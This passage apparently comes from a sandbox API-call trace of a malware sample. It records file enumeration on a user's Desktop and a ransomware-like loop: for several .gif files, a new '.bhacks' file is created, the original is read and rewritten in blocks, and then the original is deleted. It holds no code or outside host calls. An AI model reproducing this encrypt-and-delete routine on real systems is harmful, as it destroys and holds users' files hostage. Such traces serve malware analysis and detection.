cAlternateFileName="7HLCUW~1.PPT")) returned 1 [0063.334] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58416d40, ftCreationTime.dwHighDateTime=0x1d5d368, ftLastAccessTime.dwLowDateTime=0x95e58810, ftLastAccessTime.dwHighDateTime=0x1d5d616, ftLastWriteTime.dwLowDateTime=0x95e58810, ftLastWriteTime.dwHighDateTime=0x1d5d616, nFileSizeHigh=0x0, nFileSizeLow=0x171e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="CZR-hhw59bi.bmp", cAlternateFileName="CZR-HH~1.BMP")) returned 1 [0063.334] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbde6efb0, ftCreationTime.dwHighDateTime=0x1d5ca5f, ftLastAccessTime.dwLowDateTime=0x662319e0, ftLastAccessTime.dwHighDateTime=0x1d5cf99, ftLastWriteTime.dwLowDateTime=0x662319e0, ftLastWriteTime.dwHighDateTime=0x1d5cf99, nFileSizeHigh=0x0, nFileSizeLow=0x16745, dwReserved0=0x0, dwReserved1=0x0, cFileName="DN0hvZxxCeH-NYAF_H.png", cAlternateFileName="DN0HVZ~1.PNG")) returned 1 [0063.335] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2ffd140, ftCreationTime.dwHighDateTime=0x1d5d3a0, ftLastAccessTime.dwLowDateTime=0xa565dfd0, ftLastAccessTime.dwHighDateTime=0x1d5c89f, ftLastWriteTime.dwLowDateTime=0xa565dfd0, ftLastWriteTime.dwHighDateTime=0x1d5c89f, nFileSizeHigh=0x0, nFileSizeLow=0xf21c, dwReserved0=0x0, dwReserved1=0x0, cFileName="dp gvQR2 MYwMzsW1yo.mkv", cAlternateFileName="DPGVQR~1.MKV")) returned 1 [0063.335] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1afa9ca0, ftCreationTime.dwHighDateTime=0x1d5d768, ftLastAccessTime.dwLowDateTime=0x9e894010, ftLastAccessTime.dwHighDateTime=0x1d5d5cb, ftLastWriteTime.dwLowDateTime=0x9e894010, ftLastWriteTime.dwHighDateTime=0x1d5d5cb, nFileSizeHigh=0x0, nFileSizeLow=0xa84f, dwReserved0=0x0, dwReserved1=0x0, cFileName="iCkvEIW.png", cAlternateFileName="")) returned 1 [0063.335] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x434c9c30, ftCreationTime.dwHighDateTime=0x1d5cc28, ftLastAccessTime.dwLowDateTime=0x11453020, ftLastAccessTime.dwHighDateTime=0x1d5cfa8, ftLastWriteTime.dwLowDateTime=0x11453020, ftLastWriteTime.dwHighDateTime=0x1d5cfa8, nFileSizeHigh=0x0, nFileSizeLow=0x4dcd, dwReserved0=0x0, dwReserved1=0x0, cFileName="kFQqlJY89ZuDyS.ppt", cAlternateFileName="KFQQLJ~1.PPT")) returned 1 [0063.335] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5061a0, ftCreationTime.dwHighDateTime=0x1d5cd77, ftLastAccessTime.dwLowDateTime=0xf08f0a70, ftLastAccessTime.dwHighDateTime=0x1d5cd33, ftLastWriteTime.dwLowDateTime=0xf08f0a70, ftLastWriteTime.dwHighDateTime=0x1d5cd33, nFileSizeHigh=0x0, nFileSizeLow=0x2338, dwReserved0=0x0, dwReserved1=0x0, cFileName="luPvkk7BP6.m4a", cAlternateFileName="LUPVKK~1.M4A")) returned 1 [0063.335] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49e65510, ftCreationTime.dwHighDateTime=0x1d5d6ee, ftLastAccessTime.dwLowDateTime=0x811c8ad0, ftLastAccessTime.dwHighDateTime=0x1d5cd8a, ftLastWriteTime.dwLowDateTime=0x811c8ad0, ftLastWriteTime.dwHighDateTime=0x1d5cd8a, nFileSizeHigh=0x0, nFileSizeLow=0x17e9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="P-7IEYH2CNc0UByn.m4a", cAlternateFileName="P-7IEY~1.M4A")) returned 1 [0063.335] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49e65510, ftCreationTime.dwHighDateTime=0x1d5d6ee, ftLastAccessTime.dwLowDateTime=0x811c8ad0, ftLastAccessTime.dwHighDateTime=0x1d5cd8a, ftLastWriteTime.dwLowDateTime=0x811c8ad0, ftLastWriteTime.dwHighDateTime=0x1d5cd8a, nFileSizeHigh=0x0, nFileSizeLow=0x17e9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="P-7IEYH2CNc0UByn.m4a", cAlternateFileName="P-7IEY~1.M4A")) returned 0 [0063.336] FindClose (in: hFindFile=0x9bed80 | out: hFindFile=0x9bed80) returned 1 [0063.336] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\*.gif", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0063.336] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feaa0) returned 1 [0063.336] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fea60) returned 1 [0063.620] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\DqUNIlu.gif.bhacks", nBufferLength=0x105, lpBuffer=0x6fe4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\DqUNIlu.gif.bhacks", lpFilePart=0x0) returned 0x2a [0063.620] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6fe9e0) returned 1 [0063.620] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\DqUNIlu.gif.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\dqunilu.gif.bhacks"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x324 [0063.622] GetFileType (hFile=0x324) returned 0x1 [0063.622] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fe950) returned 1 [0063.622] GetFileType (hFile=0x324) returned 0x1 [0063.635] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x6feb70 | out: pfEnabled=0x6feb70) returned 0x0 [0063.932] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\DqUNIlu.gif", nBufferLength=0x105, lpBuffer=0x6fe4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\DqUNIlu.gif", lpFilePart=0x0) returned 0x23 [0063.932] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6fe9e0) returned 1 [0063.932] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\DqUNIlu.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\dqunilu.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x33c [0063.932] GetFileType (hFile=0x33c) returned 0x1 [0063.932] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fe950) returned 1 [0063.932] GetFileType (hFile=0x33c) returned 0x1 [0063.932] ReadFile (in: hFile=0x33c, lpBuffer=0x252a1c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x252a1c8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0063.939] ReadFile (in: hFile=0x33c, lpBuffer=0x252a1c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x252a1c8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0063.940] WriteFile (in: hFile=0x324, lpBuffer=0x252b3e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x252b3e0*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0063.943] ReadFile (in: hFile=0x33c, lpBuffer=0x252a1c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x252a1c8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0063.943] WriteFile (in: hFile=0x324, lpBuffer=0x252b3e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x252b3e0*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0063.947] ReadFile (in: hFile=0x33c, lpBuffer=0x252a1c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x252a1c8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0063.947] WriteFile (in: hFile=0x324, lpBuffer=0x252b3e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x252b3e0*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0063.949] ReadFile (in: hFile=0x33c, lpBuffer=0x252a1c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x252a1c8*, lpNumberOfBytesRead=0x6feb68*=0xb78, lpOverlapped=0x0) returned 1 [0063.949] WriteFile (in: hFile=0x324, lpBuffer=0x252b3e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x252b3e0*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0063.951] ReadFile (in: hFile=0x33c, lpBuffer=0x252a1c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x252a1c8*, lpNumberOfBytesRead=0x6feb68*=0x0, lpOverlapped=0x0) returned 1 [0063.951] CloseHandle (hObject=0x33c) returned 1 [0063.952] WriteFile (in: hFile=0x324, lpBuffer=0x252b3e0*, nNumberOfBytesToWrite=0xb80, lpNumberOfBytesWritten=0x6fea68, lpOverlapped=0x0 | out: lpBuffer=0x252b3e0*, lpNumberOfBytesWritten=0x6fea68*=0xb80, lpOverlapped=0x0) returned 1 [0063.952] CloseHandle (hObject=0x324) returned 1 [0063.953] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\DqUNIlu.gif", nBufferLength=0x105, lpBuffer=0x6fe640, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\DqUNIlu.gif", lpFilePart=0x0) returned 0x23 [0063.954] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\DqUNIlu.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\dqunilu.gif")) returned 1 [0064.041] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\j51yJlAI1.gif.bhacks", nBufferLength=0x105, lpBuffer=0x6fe4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\j51yJlAI1.gif.bhacks", lpFilePart=0x0) returned 0x2c [0064.041] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6fe9e0) returned 1 [0064.042] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\j51yJlAI1.gif.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\j51yjlai1.gif.bhacks"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x324 [0064.134] GetFileType (hFile=0x324) returned 0x1 [0064.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fe950) returned 1 [0064.134] GetFileType (hFile=0x324) returned 0x1 [0064.256] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\j51yJlAI1.gif", nBufferLength=0x105, lpBuffer=0x6fe4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\j51yJlAI1.gif", lpFilePart=0x0) returned 0x25 [0064.256] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6fe9e0) returned 1 [0064.256] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\j51yJlAI1.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\j51yjlai1.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x33c [0064.256] GetFileType (hFile=0x33c) returned 0x1 [0064.256] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fe950) returned 1 [0064.256] GetFileType (hFile=0x33c) returned 0x1 [0064.256] ReadFile (in: hFile=0x33c, lpBuffer=0x26391f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x26391f0*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.263] ReadFile (in: hFile=0x33c, lpBuffer=0x26391f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x26391f0*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.263] WriteFile (in: hFile=0x324, lpBuffer=0x263a408*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x263a408*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.266] ReadFile (in: hFile=0x33c, lpBuffer=0x26391f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x26391f0*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.267] WriteFile (in: hFile=0x324, lpBuffer=0x263a408*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x263a408*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.269] ReadFile (in: hFile=0x33c, lpBuffer=0x26391f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x26391f0*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.269] WriteFile (in: hFile=0x324, lpBuffer=0x263a408*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x263a408*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.284] ReadFile (in: hFile=0x33c, lpBuffer=0x24aaf18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24aaf18*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.284] WriteFile (in: hFile=0x324, lpBuffer=0x24abf48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24abf48*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.285] ReadFile (in: hFile=0x33c, lpBuffer=0x24aaf18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24aaf18*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.285] WriteFile (in: hFile=0x324, lpBuffer=0x24abf48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24abf48*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.285] ReadFile (in: hFile=0x33c, lpBuffer=0x24aaf18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24aaf18*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.285] WriteFile (in: hFile=0x324, lpBuffer=0x24abf48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24abf48*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.293] ReadFile (in: hFile=0x33c, lpBuffer=0x24aaf18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24aaf18*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.294] WriteFile (in: hFile=0x324, lpBuffer=0x24abf48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24abf48*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.294] ReadFile (in: hFile=0x33c, lpBuffer=0x24aaf18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24aaf18*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.294] WriteFile (in: hFile=0x324, lpBuffer=0x24abf48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24abf48*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.294] ReadFile (in: hFile=0x33c, lpBuffer=0x24aaf18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24aaf18*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.294] WriteFile (in: hFile=0x324, lpBuffer=0x24abf48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24abf48*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.295] ReadFile (in: hFile=0x33c, lpBuffer=0x24aaf18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24aaf18*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.295] WriteFile (in: hFile=0x324, lpBuffer=0x24abf48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24abf48*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.295] ReadFile (in: hFile=0x33c, lpBuffer=0x24aaf18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24aaf18*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.295] WriteFile (in: hFile=0x324, lpBuffer=0x24abf48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24abf48*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.296] ReadFile (in: hFile=0x33c, lpBuffer=0x24aaf18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24aaf18*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.296] WriteFile (in: hFile=0x324, lpBuffer=0x24abf48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24abf48*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.296] ReadFile (in: hFile=0x33c, lpBuffer=0x24aaf18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24aaf18*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.296] WriteFile (in: hFile=0x324, lpBuffer=0x24abf48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24abf48*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.297] ReadFile (in: hFile=0x33c, lpBuffer=0x24aaf18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24aaf18*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.297] WriteFile (in: hFile=0x324, lpBuffer=0x24abf48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24abf48*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.297] ReadFile (in: hFile=0x33c, lpBuffer=0x24aaf18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24aaf18*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.297] WriteFile (in: hFile=0x324, lpBuffer=0x24abf48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24abf48*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.297] ReadFile (in: hFile=0x33c, lpBuffer=0x24aaf18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24aaf18*, lpNumberOfBytesRead=0x6feb68*=0x253, lpOverlapped=0x0) returned 1 [0064.297] WriteFile (in: hFile=0x324, lpBuffer=0x24abf48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24abf48*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.298] ReadFile (in: hFile=0x33c, lpBuffer=0x24aaf18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24aaf18*, lpNumberOfBytesRead=0x6feb68*=0x0, lpOverlapped=0x0) returned 1 [0064.298] CloseHandle (hObject=0x33c) returned 1 [0064.298] WriteFile (in: hFile=0x324, lpBuffer=0x24abf48*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x6fea68, lpOverlapped=0x0 | out: lpBuffer=0x24abf48*, lpNumberOfBytesWritten=0x6fea68*=0x260, lpOverlapped=0x0) returned 1 [0064.298] CloseHandle (hObject=0x324) returned 1 [0064.300] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\j51yJlAI1.gif", nBufferLength=0x105, lpBuffer=0x6fe640, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\j51yJlAI1.gif", lpFilePart=0x0) returned 0x25 [0064.300] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\j51yJlAI1.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\j51yjlai1.gif")) returned 1 [0064.339] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\mCQMPnOOyUYP.gif.bhacks", nBufferLength=0x105, lpBuffer=0x6fe4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\mCQMPnOOyUYP.gif.bhacks", lpFilePart=0x0) returned 0x2f [0064.339] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6fe9e0) returned 1 [0064.339] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\mCQMPnOOyUYP.gif.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\mcqmpnooyuyp.gif.bhacks"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x324 [0064.339] GetFileType (hFile=0x324) returned 0x1 [0064.339] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fe950) returned 1 [0064.340] GetFileType (hFile=0x324) returned 0x1 [0064.463] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\mCQMPnOOyUYP.gif", nBufferLength=0x105, lpBuffer=0x6fe4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\mCQMPnOOyUYP.gif", lpFilePart=0x0) returned 0x28 [0064.464] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6fe9e0) returned 1 [0064.464] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\mCQMPnOOyUYP.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\mcqmpnooyuyp.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x33c [0064.464] GetFileType (hFile=0x33c) returned 0x1 [0064.464] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fe950) returned 1 [0064.464] GetFileType (hFile=0x33c) returned 0x1 [0064.464] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21c0*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.469] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21c0*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.469] WriteFile (in: hFile=0x324, lpBuffer=0x24c33d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c33d8*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.470] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21c0*, lpNumberOfBytesRead=0x6feb68*=0xd9a, lpOverlapped=0x0) returned 1 [0064.470] WriteFile (in: hFile=0x324, lpBuffer=0x24c33d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c33d8*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.471] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21c0*, lpNumberOfBytesRead=0x6feb68*=0x0, lpOverlapped=0x0) returned 1 [0064.471] CloseHandle (hObject=0x33c) returned 1 [0064.471] WriteFile (in: hFile=0x324, lpBuffer=0x24c33d8*, nNumberOfBytesToWrite=0xda0, lpNumberOfBytesWritten=0x6fea68, lpOverlapped=0x0 | out: lpBuffer=0x24c33d8*, lpNumberOfBytesWritten=0x6fea68*=0xda0, lpOverlapped=0x0) returned 1 [0064.471] CloseHandle (hObject=0x324) returned 1 [0064.473] GetFullPathNameW (in: 